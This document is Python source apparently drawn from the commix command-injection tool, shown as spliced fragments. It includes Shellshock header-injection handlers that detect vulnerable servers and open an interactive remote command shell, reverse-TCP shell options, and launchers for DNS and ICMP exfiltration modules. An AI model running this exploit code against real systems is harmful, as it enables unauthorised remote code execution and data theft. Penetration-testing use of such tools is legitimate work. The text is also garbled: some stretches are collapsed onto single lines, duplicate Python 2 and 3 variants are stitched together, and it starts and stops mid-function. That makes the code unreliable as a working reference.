                        lhost, lport = reverse_tcp.configure_reverse_tcp()
                        while True:
                          # Precedence: `lhost and (lport in SHELL_OPTIONS)`.
                          if lhost and lport in settings.SHELL_OPTIONS:
                            result = checks.check_reverse_tcp_options(lhost)
                          else:
                            cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
                            result = checks.check_reverse_tcp_options(cmd)
                          if result != None:
                            if result == 0:
                              return False
                            elif result == 1 or result == 2:
                              go_back_again = True
                              break
                          # Command execution results.
                          shell = cmd_exec(url, cmd, cve, check_header, filename)
                          if menu.options.verbose:
                            print ""
                          print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
                      else:
                        pass
                    else:
                      shell = cmd_exec(url, cmd, cve, check_header, filename)
                      print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                  except KeyboardInterrupt:
                    raise
                  except SystemExit:
                    raise
                  except:
                    # Bare except: any other error (EOFError on Ctrl-D, a
                    # failing cmd_exec, ...) ends the run silently with status 0.
                    print ""
                    sys.exit(0)
              elif gotshell in settings.CHOISE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True
              elif gotshell in settings.CHOISE_QUIT:
                sys.exit(0)
              else:
                if gotshell == "":
                  gotshell = "enter"
                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                continue
              break
            else:
              # while/else clause: the loop above only leaves via break or
              # return, so this branch never runs.
              continue
  except urllib2.HTTPError, err:
    # The handler sits outside the header loops: after the user chooses to
    # continue, the remaining headers are NOT probed and the function
    # returns None.
    if settings.IGNORE_ERR_MSG == False:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      continue_tests = checks.continue_tests(err)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
def shellshock_handler(url, http_request_method, filename):
  # Python 3 variant.  Probes each header in `headers` with every CVE payload
  # from `shellshock_payloads`; a finding is a response whose headers contain
  # the "<cve>:Done" marker.  Findings are logged and then handed to the
  # enumeration / file-access / pseudo-terminal flows.  Returns False
  # (nothing found) or True (user backed out of a finding); most other exits
  # raise SystemExit.
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "shellshock injection technique"
  info_msg = "Testing the " + technique + ". "
  if settings.VERBOSITY_LEVEL >= 2:
    info_msg = info_msg + "\n"
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        # Check injection state
        settings.DETECTION_PHASE = True
        settings.EXPLOITATION_PHASE = False
        i = i + 1
        # "<cve>:Done" is the marker the detection below looks for.
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)
        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          sys.stdout.write("\n" + settings.print_payload(payload))
        elif settings.VERBOSITY_LEVEL >= 2:
          debug_msg = "Generating payload for the injection."
          print(settings.print_debug_msg(debug_msg))
          print(settings.print_payload(payload))
        header = {check_header : payload}
        request = _urllib.request.Request(url, None, header)
        # Keeps menu.options.agent in step with the header being probed.
        # NOTE: this rewrites the shared option for the rest of the session.
        if check_header == "User-Agent":
          menu.options.agent = payload
        else:
          menu.options.agent = default_user_agent
        log_http_headers.do_check(request)
        log_http_headers.check_http_traffic(request)
        # Check if defined any HTTP Proxy.
        if menu.options.proxy:
          response = proxy.use_proxy(request)
        # Check if defined Tor.
        elif menu.options.tor:
          response = tor.use_tor(request)
        else:
          # Only the direct path passes settings.TIMEOUT here.
          response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT)
        percent = ((i*100)/total)
        float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
        # NOTE(review): the "100.0" branch is tested before the marker check,
        # so the response of the LAST probe is never inspected for `cve`;
        # a finding on the final header is missed.
        if str(float_percent) == "100.0":
          if no_result == True:
            percent = settings.FAIL_STATUS
          else:
            percent = settings.info_msg
            no_result = False
        elif len(response.info()) > 0 and cve in response.info():
          percent = settings.info_msg
          no_result = False
        else:
          percent = str(float_percent)+ "%"
        if settings.VERBOSITY_LEVEL == 0:
          info_msg = "Testing the " + technique + "." + "" + percent + ""
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()
        if no_result == False:
          # Check injection state
          settings.DETECTION_PHASE = False
          settings.EXPLOITATION_PHASE = True
          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          vuln_parameter = "HTTP Header"
          the_type = " " + vuln_parameter
          # A leading space is added for the log line and stripped again below.
          check_header = " " + check_header
          vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
          check_header = check_header[1:]
          logs.update_payload(filename, counter, payload)
          if settings.VERBOSITY_LEVEL != 0:
            if settings.VERBOSITY_LEVEL == 1:
              print(settings.SINGLE_WHITESPACE)
            checks.total_of_requests()
          info_msg = "The (" + check_header + ") '"
          info_msg += url + Style.RESET_ALL + Style.BRIGHT
          info_msg += "' seems vulnerable via " + technique + "."
          if settings.VERBOSITY_LEVEL == 0:
            print(settings.SINGLE_WHITESPACE)
          print(settings.print_bold_info_msg(info_msg))
          sub_content = "\"" + payload + "\""
          print(settings.print_sub_content(sub_content))
          # Enumeration options.
          # NOTE: answers are not lower-cased in this version (unlike the
          # os-shell commands below); matching depends on settings.CHOICE_*.
          if settings.ENUMERATION_DONE == True :
            if settings.VERBOSITY_LEVEL != 0:
              print(settings.SINGLE_WHITESPACE)
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to enumerate again? [Y/n] > "
                enumerate_again = _input(settings.print_question_msg(question_msg))
              else:
                enumerate_again = ""
              # Empty answer (and batch mode) defaults to "yes".
              if len(enumerate_again) == 0:
                enumerate_again = "Y"
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO:
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                err_msg = "'" + enumerate_again + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                pass
          else:
            enumeration(url, cve, check_header, filename)
          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to access files again? [Y/n] > "
                file_access_again = _input(settings.print_question_msg(question_msg))
              else:
                file_access_again = ""
              if len(file_access_again) == 0:
                file_access_again = "Y"
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO:
                break
              elif file_access_again in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                err_msg = "'" + file_access_again + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                pass
          else:
            file_access(url, cve, check_header, filename)
          if menu.options.os_cmd:
            cmd = menu.options.os_cmd
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            # BUG: print() returns None, so `None + Fore.GREEN ...` raises
            # TypeError and the output of --os-cmd is never shown.
            print("\n") + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            raise SystemExit()
          else:
            # Pseudo-Terminal shell
            print(settings.SINGLE_WHITESPACE)
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if not menu.options.batch:
                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                gotshell = _input(settings.print_question_msg(question_msg))
              else:
                gotshell = ""
              if len(gotshell) == 0:
                gotshell = "Y"
              if gotshell in settings.CHOICE_YES:
                # if not menu.options.batch:
                #   print(settings.SINGLE_WHITESPACE)
                print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)")
                if settings.READLINE_ERROR:
                  checks.no_readline_module()
                while True:
                  try:
                    if not settings.READLINE_ERROR:
                      checks.tab_autocompleter()
                    sys.stdout.write(settings.OS_SHELL)
                    cmd = _input()
                    cmd = checks.escaped_cmd(cmd)
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
                      if go_back:
                        break
                    else:
                      # NOTE: `payload` (the loop's probe payload) is
                      # overwritten by the executed command's payload here.
                      shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                      if shell != "":
                        # Update logs with executed cmds and execution results.
                        logs.executed_command(filename, cmd, shell)
                        print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n")
                      else:
                        debug_msg = "Executing the '" + cmd + "' command. "
                        # Both verbosity branches do the same thing.
                        if settings.VERBOSITY_LEVEL == 1:
                          sys.stdout.write(settings.print_debug_msg(debug_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
                        elif settings.VERBOSITY_LEVEL >= 2:
                          sys.stdout.write(settings.print_debug_msg(debug_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print(settings.print_critical_msg(err_msg) + "\n")
                  except KeyboardInterrupt:
                    raise
                  except SystemExit:
                    raise
                  except EOFError:
                    err_msg = "Exiting, due to EOFError."
                    print(settings.print_error_msg(err_msg))
                    raise
                  except TypeError:
                    # Leaves the os-shell loop silently; the cause is not shown.
                    break
              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True
              elif gotshell in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                err_msg = "'" + gotshell + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                continue
              break
            else:
              # while/else clause: the loop above only leaves via break or
              # return, so this branch never runs.
              continue
    if no_result:
      if settings.VERBOSITY_LEVEL != 2:
        print(settings.SINGLE_WHITESPACE)
      err_msg = "All tested HTTP headers appear to be not injectable."
      print(settings.print_critical_msg(err_msg))
      raise SystemExit()
  except _urllib.error.HTTPError as err_msg:
    # The handlers sit outside the header loops: after the user chooses to
    # continue, the remaining headers are NOT probed and the function
    # returns None.
    if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(err_msg.code) == settings.BAD_REQUEST:
      response = False
    elif settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      print("\n" + settings.print_critical_msg(err))
      continue_tests = checks.continue_tests(err_msg)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
  except _urllib.error.URLError as err_msg:
    # Drops the first two words of the reason (presumably an errno prefix);
    # a reason shorter than three words leaves just ".".
    err_msg = str(err_msg.reason).split(" ")[2:]
    err_msg = ' '.join(err_msg)+ "."
    if settings.VERBOSITY_LEVEL != 0 and settings.LOAD_SESSION == False:
      print(settings.SINGLE_WHITESPACE)
    print(settings.print_critical_msg(err_msg))
    raise SystemExit()
  except _http_client.IncompleteRead as err_msg:
    # BUG: `err_msg` is the exception object, and IncompleteRead does not
    # support `+ str`, so this line raises TypeError instead of printing.
    print(settings.print_critical_msg(err_msg + "."))
    raise SystemExit()
response = False except urllib2.URLError, err: if "Connection refused" in err.reason: err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print "\n" + settings.print_critical_msg(err_msg) raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print settings.print_error_msg(err) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print "\n" + settings.print_critical_msg(err_msg) raise SystemExit() else: try: response = urllib2.urlopen(request)
def shellshock_handler(url, http_request_method, filename):
  # Python 2 variant with verbosity levels.  Probes each header in `headers`
  # with every CVE payload from `shellshock_payloads`; a finding is a
  # response whose headers contain the "<cve>:Done" marker.  Findings are
  # logged and then handed to the enumeration / file-access / pseudo-terminal
  # flows.  Returns False (nothing found) or True (user backed out of a
  # finding); quit paths use sys.exit / SystemExit.
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "shellshock injection technique"
  info_msg = "Testing the " + technique + "... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        # Check injection state
        settings.DETECTION_PHASE = True
        settings.EXPLOITATION_PHASE = False
        i = i + 1
        # "<cve>:Done" is the marker the detection below looks for.
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)
        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          sys.stdout.write("\n" + settings.print_payload(payload))
        elif settings.VERBOSITY_LEVEL > 1:
          info_msg = "Generating a payload for injection..."
          print "\n" + settings.print_info_msg(info_msg)
          print settings.print_payload(payload)
        header = {check_header: payload}
        request = urllib2.Request(url, None, header)
        log_http_headers.check_http_traffic(request)
        # Direct request with urllib2 defaults: no timeout argument (the
        # global socket default applies) and no proxy / Tor routing.
        response = urllib2.urlopen(request)
        percent = ((i * 100) / total)
        float_percent = "{0:.1f}".format(round(((i * 100) / (total * 1.0)), 2))
        # NOTE(review): the "100.0" branch is tested before the marker checks,
        # so the response of the LAST probe is never inspected for `cve`;
        # a finding on the final header is missed.
        if str(float_percent) == "100.0":
          if no_result == True:
            percent = Fore.RED + "FAILED" + Style.RESET_ALL
          else:
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
            no_result = False
        elif len(response.info()) > 0 and cve in response.info():
          percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          no_result = False
        elif len(response.read()) > 0 and cve in response.read():
          # BUG: the first read() consumes the body, the second returns "",
          # so `cve in ""` is always False and this branch can never match.
          percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          no_result = False
        else:
          percent = str(float_percent) + "%"
        if not settings.VERBOSITY_LEVEL >= 1:
          info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()
        if no_result == False:
          # Check injection state
          settings.DETECTION_PHASE = False
          settings.EXPLOITATION_PHASE = True
          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          #if vp_flag == True:
          vuln_parameter = "HTTP Header"
          the_type = " " + vuln_parameter
          # A leading space is added for the log line and stripped again below.
          check_header = " " + check_header
          vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
          check_header = check_header[1:]
          logs.update_payload(filename, counter, payload)
          success_msg = "The (" + check_header + ") '"
          success_msg += url + Style.RESET_ALL + Style.BRIGHT
          success_msg += "' seems vulnerable via " + technique + "."
          print "\n" + settings.print_success_msg(success_msg)
          print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL
          if not settings.VERBOSITY_LEVEL >= 1:
            print ""
          # Enumeration options.
          if settings.ENUMERATION_DONE == True:
            if settings.VERBOSITY_LEVEL >= 1:
              print ""
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to enumerate again? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                enumerate_again = sys.stdin.readline().replace("\n", "").lower()
              else:
                enumerate_again = ""
              # Empty answer (and batch mode) defaults to "yes".
              if len(enumerate_again) == 0:
                enumerate_again = "y"
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO:
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                err_msg = "'" + enumerate_again + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                pass
          else:
            enumeration(url, cve, check_header, filename)
          # File access options.
          if settings.FILE_ACCESS_DONE == True:
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to access files again? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                file_access_again = sys.stdin.readline().replace("\n", "").lower()
              else:
                file_access_again = ""
              if len(file_access_again) == 0:
                file_access_again = "y"
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO:
                break
              elif file_access_again in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                err_msg = "'" + file_access_again + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                pass
          else:
            file_access(url, cve, check_header, filename)
          if menu.options.os_cmd:
            cmd = menu.options.os_cmd
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
            sys.exit(0)
          else:
            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                if settings.VERBOSITY_LEVEL >= 1:
                  print ""
              if not menu.options.batch:
                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                gotshell = sys.stdin.readline().replace("\n", "").lower()
              else:
                gotshell = ""
              if len(gotshell) == 0:
                gotshell = "y"
              if gotshell in settings.CHOICE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                if readline_error:
                  checks.no_readline_module()
                while True:
                  try:
                    if not readline_error:
                      # Tab compliter
                      readline.set_completer(menu.tab_completer)
                      # MacOSX tab compliter
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab compliter
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
                      if go_back:
                        break
                    else:
                      # NOTE: `payload` (the loop's probe payload) is
                      # overwritten by the executed command's payload here.
                      shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                      if shell != "":
                        # Update logs with executed cmds and execution results.
                        logs.executed_command(filename, cmd, shell)
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                      else:
                        info_msg = "Executing the '" + cmd + "' command... "
                        if settings.VERBOSITY_LEVEL == 1:
                          sys.stdout.write("\n" + settings.print_info_msg(info_msg))
                        elif settings.VERBOSITY_LEVEL > 1:
                          sys.stdout.write(settings.print_info_msg(info_msg))
                        sys.stdout.flush()
                        sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
                        #print "\n" + settings.print_payload(payload)
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print settings.print_critical_msg(err_msg) + "\n"
                  except KeyboardInterrupt:
                    raise
                  except SystemExit:
                    raise
                  except:
                    # Bare except: any other error (EOFError on Ctrl-D, a
                    # failing cmd_exec, ...) ends the run silently with status 0.
                    print ""
                    sys.exit(0)
              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True
              elif gotshell in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                err_msg = "'" + gotshell + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                continue
              break
            else:
              # while/else clause: the loop above only leaves via break or
              # return, so this branch never runs.
              continue
    if no_result:
      print ""
  except urllib2.HTTPError, err_msg:
    # The handler sits outside the header loops: after the user chooses to
    # continue, the remaining headers are NOT probed and the function
    # returns None.
    if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
      response = False
    elif settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      print "\n" + settings.print_critical_msg(err)
      continue_tests = checks.continue_tests(err_msg)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) else: try: response = urllib2.urlopen(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg)
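def _dns_probe_http_error(err_msg):
  """Handle an HTTP error status raised while sending the initial probe.

  A 500 (settings.INTERNAL_SERVER_ERROR) is treated as "no usable response"
  and ignored, as the other request helpers in this project do.  Any other
  status is printed once and the operator is asked, via
  checks.continue_tests, whether to carry on; answering no terminates the
  process.  Once the operator has agreed to continue, settings.IGNORE_ERR_MSG
  silences later errors.  Always returns False so the caller can use the
  result in place of a response.
  """
  if str(err_msg.code) != settings.INTERNAL_SERVER_ERROR and settings.IGNORE_ERR_MSG == False:
    err = str(err_msg) + "."
    # The previous code did print("\n") + settings.print_critical_msg(err):
    # print() returns None, so that line raised TypeError before the real
    # error message was ever shown.
    print("\n" + settings.print_critical_msg(err))
    if checks.continue_tests(err_msg) == True:
      settings.IGNORE_ERR_MSG = True
    else:
      # NOTE: os._exit() skips atexit handlers and stdout flushing and
      # reports status 0 to the shell; kept for consistency with the rest
      # of this module.
      os._exit(0)
  return False


def _dns_send_probe(request):
  """Send ``request`` over the configured transport (proxy, Tor or direct).

  Returns the transport's response, or False when the server answered with
  an HTTP error status (see _dns_probe_http_error).  URLErrors such as an
  unreachable host are not handled here and propagate to the caller.
  """
  try:
    if menu.options.proxy:
      return proxy.use_proxy(request)
    if menu.options.tor:
      return tor.use_tor(request)
    return _urllib.request.urlopen(request)
  except _urllib.error.HTTPError as err_msg:
    return _dns_probe_http_error(err_msg)


def dns_exfiltration_handler(url, http_request_method):
  """Prepare and launch the DNS exfiltration module against ``url``.

  Steps: require root, build the request (for GET the vulnerable parameter
  is taken from the URL; otherwise from ``--data`` after unquoting and
  parameters.do_POST_check), send one probe through the configured
  transport to surface HTTP errors early, refuse Windows targets, then hand
  over to exploitation() with the ``--dns-server`` option value.

  Args:
    url: target URL.
    http_request_method: "GET" or a POST-style method string.

  The process is terminated with os._exit(0) when not running as root, when
  the identified target OS is "win", or when the operator declines to
  continue after an HTTP error.  The probe's response is not inspected.
  """
  # Check injection state
  settings.DETECTION_PHASE = True
  settings.EXPLOITATION_PHASE = False
  # os.geteuid() only exists on POSIX, so this check itself fails on a
  # Windows attacker host.  NOTE(review): another module in this tree uses
  # common.running_as_admin() for the same purpose — consider aligning.
  if os.geteuid() != 0:
    err_msg = "You need to have root privileges to run this option."
    print("\n" + settings.print_critical_msg(err_msg))
    os._exit(0)
  if http_request_method == "GET":
    vuln_parameter = parameters.vuln_GET_param(url)
    request = _urllib.request.Request(url)
    headers.do_check(request)
  else:
    parameter = menu.options.data
    parameter = _urllib.parse.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = _urllib.request.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  # Single probe: its only purpose is to surface (and let the operator
  # decide on) HTTP errors before the module starts.
  _dns_send_probe(request)
  if settings.TARGET_OS == "win":
    err_msg = "This module's payloads are not supported by "
    err_msg += "the identified target operating system."
    print(settings.print_critical_msg(err_msg) + "\n")
    os._exit(0)
  dns_server = menu.options.dns_server
  technique = "DNS exfiltration module"
  info_msg = "Loading the " + technique + ". \n"
  sys.stdout.write(settings.print_info_msg(info_msg))
  exploitation(dns_server, url, http_request_method, vuln_parameter, technique)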
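def _icmp_probe_http_error(err_msg):
  """Handle an HTTP error status raised while sending the initial probe.

  A 500 (settings.INTERNAL_SERVER_ERROR) or 400 (settings.BAD_REQUEST) is
  ignored.  Any other status is printed once and the operator is asked, via
  checks.continue_tests, whether to carry on; answering no terminates the
  process.  Once the operator has agreed to continue, settings.IGNORE_ERR_MSG
  silences later errors.  Always returns False so the caller can use the
  result in place of a response.
  """
  code = str(err_msg.code)
  ignored = code == settings.INTERNAL_SERVER_ERROR or code == settings.BAD_REQUEST
  if not ignored and settings.IGNORE_ERR_MSG == False:
    err = str(err_msg) + "."
    print("\n" + settings.print_critical_msg(err))
    if checks.continue_tests(err_msg) == True:
      settings.IGNORE_ERR_MSG = True
    else:
      # NOTE: os._exit() skips cleanup and reports status 0 to the shell;
      # kept for consistency with the rest of this module.
      os._exit(0)
  return False


def _icmp_send_probe(request):
  """Send ``request`` over the configured transport (proxy, Tor or direct).

  Only the direct path applies settings.TIMEOUT; the proxy and Tor helpers
  manage their own timeouts (not visible from here).  Returns the response,
  or False when the server answered with an HTTP error status.  URLErrors
  propagate to the caller.
  """
  try:
    if menu.options.proxy:
      return proxy.use_proxy(request)
    if menu.options.tor:
      return tor.use_tor(request)
    return _urllib.request.urlopen(request, timeout=settings.TIMEOUT)
  except _urllib.error.HTTPError as err_msg:
    return _icmp_probe_http_error(err_msg)


def _icmp_endpoints(ip_data):
  """Split the ``ip_src=A,ip_dst=B`` option value into ``(A, B)``.

  The patterns are the original ones (``ip_src=(.*),`` and ``ip_dst=(.*)``,
  greedy); a field that is absent comes back as "".  ``ip_data`` must be a
  string — the caller substitutes "" for a missing option.
  """
  ip_src = ''.join(re.findall(r"ip_src=(.*),", ip_data))
  ip_dst = ''.join(re.findall(r"ip_dst=(.*)", ip_data))
  return ip_src, ip_dst


def icmp_exfiltration_handler(url, http_request_method):
  """Prepare and launch the ICMP exfiltration module against ``url``.

  Steps: require administrative privileges (raw ICMP sockets), build the
  request (non-POST: vulnerable parameter from the URL; POST: from
  ``--data`` after unquoting and parameters.do_POST_check), send one probe
  to surface HTTP errors early, refuse Windows targets, parse the
  source/destination addresses from the ICMP data option and hand over to
  exploitation().

  Args:
    url: target URL.
    http_request_method: HTTP method string, compared with
      settings.HTTPMETHOD.POST.

  The process is terminated with os._exit(0) when not privileged, when the
  target OS is "win", when the ICMP source/destination addresses are
  missing, or when the operator declines to continue after an HTTP error.
  """
  # Check injection state
  settings.DETECTION_PHASE = True
  settings.EXPLOITATION_PHASE = False
  # You need to have administrative privileges to run this module.
  if not common.running_as_admin():
    err_msg = "You need to have administrative privileges to run this module."
    print(settings.print_critical_msg(err_msg) + "\n")
    os._exit(0)
  if http_request_method != settings.HTTPMETHOD.POST:
    request = _urllib.request.Request(url)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_GET_param(url)
  else:
    parameter = menu.options.data
    parameter = _urllib.parse.unquote(parameter)
    parameter = parameters.do_POST_check(parameter, http_request_method)
    request = _urllib.request.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  # Single probe: its only purpose is to surface HTTP errors before the
  # module starts; the response is not inspected.
  _icmp_send_probe(request)
  if settings.TARGET_OS == "win":
    err_msg = "This module's payloads are not supported by "
    err_msg += "the identified target operating system."
    print(settings.print_critical_msg(err_msg) + "\n")
    os._exit(0)
  technique = "ICMP exfiltration module"
  info_msg = "Loading the " + technique + ". \n"
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  # A missing option used to raise TypeError inside re.findall, and a
  # malformed one silently passed empty addresses on to exploitation().
  ip_src, ip_dst = _icmp_endpoints(menu.options.ip_icmp_data or "")
  if not ip_src or not ip_dst:
    err_msg = "The ICMP exfiltration module requires both 'ip_src' and 'ip_dst' values."
    print(settings.print_critical_msg(err_msg) + "\n")
    os._exit(0)
  exploitation(ip_dst, ip_src, url, http_request_method, vuln_parameter, technique)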
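def _blank_lines_before_error():
  """Print the blank line(s) that separate an error from in-place progress output.

  The conditions are the ones the proxy and Tor paths always used: one blank
  line unless a time-based / eval-based progress line is being redrawn, and
  a second one in verbose mode when no session is being loaded.
  """
  if (not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False) or \
     (settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None):
    print("")
  if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
    print("")


def _continue_or_exit(err_msg):
  """Ask (through checks.continue_tests) whether to keep testing after an HTTP error.

  "Yes" sets settings.IGNORE_ERR_MSG so later errors are swallowed for the
  rest of the run; "no" raises SystemExit.
  """
  if checks.continue_tests(err_msg) == True:
    settings.IGNORE_ERR_MSG = True
  else:
    raise SystemExit()


def _should_report(err_msg):
  """True when an HTTPError must be shown to the operator.

  A 500 is never reported (a crashed backend is handled by the caller as a
  False response), nothing is reported once the operator has chosen to
  ignore errors, and the status given with ``--ignore-code`` is skipped.
  The previous code honoured ``--ignore-code`` only on the direct path, so
  proxy and Tor users had the option silently ignored.
  """
  code = str(err_msg.code)
  return code != settings.INTERNAL_SERVER_ERROR \
      and settings.IGNORE_ERR_MSG == False \
      and code != str(menu.options.ignore_code)


def _url_error_text(err_msg):
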